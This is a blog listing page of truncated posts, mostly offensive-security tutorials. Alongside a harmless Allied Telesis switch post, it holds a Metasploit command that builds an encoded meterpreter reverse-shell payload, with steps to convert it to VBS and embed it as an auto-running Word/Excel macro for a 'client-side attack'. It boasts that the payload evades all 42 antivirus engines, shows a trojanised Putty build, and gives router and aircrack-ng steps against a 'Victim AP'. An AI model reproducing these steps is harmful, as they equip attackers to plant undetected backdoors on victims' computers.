Posts

Changing Skill Set from Cisco to Allied Telesis( The Story Begin)

After 10 years playing around with Cisco now I admit that I must moving forward in cost reduction equipment that my company bought.Even its really hard to accept as I very familiar with cisco command now I have to learn a new product that my company bought,Its so call Allied Telesis. Basically it just a switches but the different CLI make me hard to learn.I what so ever have to learn step by step from the beginning.Dammit...!! Just like an alien to me for this product..lol!Anyhow tommorow I will started to configure some ATI model ( AT-8000s ) switches.Hopefully its will works as I crack up my head for this bugger ass switches...No heart felling Allied Telesis :P As for the starter, below are some basic command to configure VLANs at ATI switch ( AT-8000s ) Show All running config ================== show startup-config Show Interface ============== sh interfaces status ethernet Check on spanning tree status ============================= show spanning-tree How to config...

How to connect back your Drone if your network have Natting(Port Forward Cisco Way)

1)Must configure at Attacker Router =================================== Rouer>en Router# Router#config t # To forward port 3389 TCP to the computer that had the 192.168.1.24 ip address you would do the following. Router(config)# Router(config)#ip nat inside source static tcp 172.16.2.60 3389 interface fa0/0 3389 Router(config)#end Router# #Make sure to Write Memory to make it persistent Router#wr mem ================================ 2)Cannot Remove the Nat config that being done ( How to ) ====================================================== Error ------ Router(config)#no ip nat inside source static tcp 172.16.2.60 3389 interface fa0/0 3389 %Static entry in use, cannot remove Solution -------- Better to kill the jobs created by Metasploit Payload : jobs Output(Jobs) ----------- Id Name -- ---- 135 Auxiliary: server/browser_autopwn Payload : kill 135 [*] Cleaning up exploits... Then on Router Part. ------------------- Router#clear ip...

Aircrack-Ng Fix Channel Mode : -1 on NattyNarwhal ( Ubuntu 11.04) (Solution)

After a few months I finally resolved my Fix Channel Mode : -1 on Aircrack-ng with Ubuntu 11.04. As far I concern most of the time i been using (Monitor Mode) mon0 as the interface but actually we can set and used wlan0 in monitor mode as well. Sorry I bit slow in this resolution even this might be resolved by others long time ago.But its keep bugging me to find a solution for it. Below are the step taken : 1) If you already enable mon0 kindly turn it off - airmon-ng stop wlan0 / mon0 2) After that you need to follow this instruction : a) ifconfig wlan0 down b) iwconfig wlan0 mode managed c) ifconfig wlan0 up d) iwconfig wlan0 channel (Channel of the Victim AP) e) ifconfig wlan0 down f) iwconfig wlan0 mode monitor g) ifconfig wlan0 up 3) You may skip ( a / b ) but better to do it in-active mode.

Reverse Tunnel for Windows Using Freecap with Putty.

Image
INTRODUCTION This document will cover on how to tunnel using Freecap and Putty. Download Link: Freecap Putty Putty Configuration Added the forwarding port Open the connection Freecap Configuration Changing FreeCap proxy settings Adding Program inside FreeCap Testing the tunnel Credit to Author Pieth

(Backdoor Part 3)How to Convert *.EXE Payload into *.VBS Payload

This is the way on how I embedded it. root@LM:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 R | ./msfencode -t exe -e x86/shikata_ga_nai X > payload.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) root@LM:/opt/metasploit3/msf# root@LM:/opt/metasploit3/msf3# mv payload.exe tools/ root@LM:/opt/metasploit3/msf3/tools# ruby exe2vba.rb payload.exe payload.vbs [*] Converted 73802 bytes of EXE into a VBA script #payload.vbs Now open your MS WORD/EXECL and perform this following step. In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you’re using Word/Excel 2007, go to View Macros, then place a name like “lancit” and select “create”. It's will pop-up a visual basic editor and paste the output of the payload.vbs and safe it.Put any word you in your actual word doc itself.The purpose is for the client-side-attack. The Output is like this : Sub Auto_open() . . . . . . En...

(Backdoor Part 2)At last..Payload CANT BE DETECTED..!!

Why its cant be detected,where at first I encode it with *.exe then I manipulate it using ruby to be embedded inside *.vbs extension and below is the result from virus total. File name:payload.vbs Submission date:2011-05-23 17:32:43 (UTC) Current status:finished Result:0/ 42 (0.0%) Additional information MD5 : 8e54f3b36507c7c3f4a80ee336e367ae SHA1 : ed8ba524a09494dcd7f86dbe5859339706264911 SHA256: 3ff926d2c6dfcee6443de3f0f0916a5ce1d1ccebe6f55399fcb8118758fc041d ssdeep: 6144:kgwFOmxCAB1vR5CGikL/xz+fk+8yXRruNG63b/IjRuePX7k49TQ7rBlLRc3aT+ch:vwEmw AvvR5CbS/9R+86RruNbLgduePXI File size : 297145 bytes First seen: 2011-05-23 17:32:43 Last seen : 2011-05-23 17:32:43 TrID: Unknown! sigcheck: publisher....: n/a copyright....: n/a product......: n/a description..: n/a original name: n/a internal name: n/a file version.: n/a comments.....: n/a signers......: - signing date.: - verified.....: Unsigned

(Backdoor Part 1)Not A Successful Embedded PAYLOAD in Putty. But close Enough.. :D

Hi Guys, Tonight I manage to embedded PAYLOAD inside putty and according to VirusTotal I manage to be detected (As Below Result). File name:putty01.exe Result:18/ 42 (42.9%) The AV that detected are : AntiVir 7.11.8.89 2011.05.21 TR/Crypt.XPACK.Gen Avast 4.8.1351.0 2011.05.22 Win32:Vykuk Avast5 5.0.677.0 2011.05.22 Win32:Vykuk BitDefender 7.2 2011.05.22 Backdoor.Shell.AC CAT-QuickHeal 11.00 2011.05.22 (Suspicious) - DNAScan Commtouch 5.3.2.6 2011.05.22 W32/Swrort.D Comodo 8797 2011.05.22 Heur.Corrupt.PE DrWeb 5.0.2.03300 2011.05.22 Trojan.Packed.196 eSafe 7.0.17.0 2011.05.22 Suspicious File F-Prot 4.6.2.117 2011.05.22 W32/Swrort.D F-Secure 9.0.16440.0 2011.05.22 Backdoor.Shell.AC GData 22 2011.05.22 Backdoor.Shell.AC Microsoft 1.6903 2011.05.22 Trojan:Win32/Swrort.A NOD32 6142 2011.05.22 a variant of Win32/Rozena.AG Norman 6.07.07 2011.05.22 W32/Swrort.A nProtect 2011-05-22.01 2011.05.22 Backdoor/W32.Shell.458752 Sophos 4.65.0 ...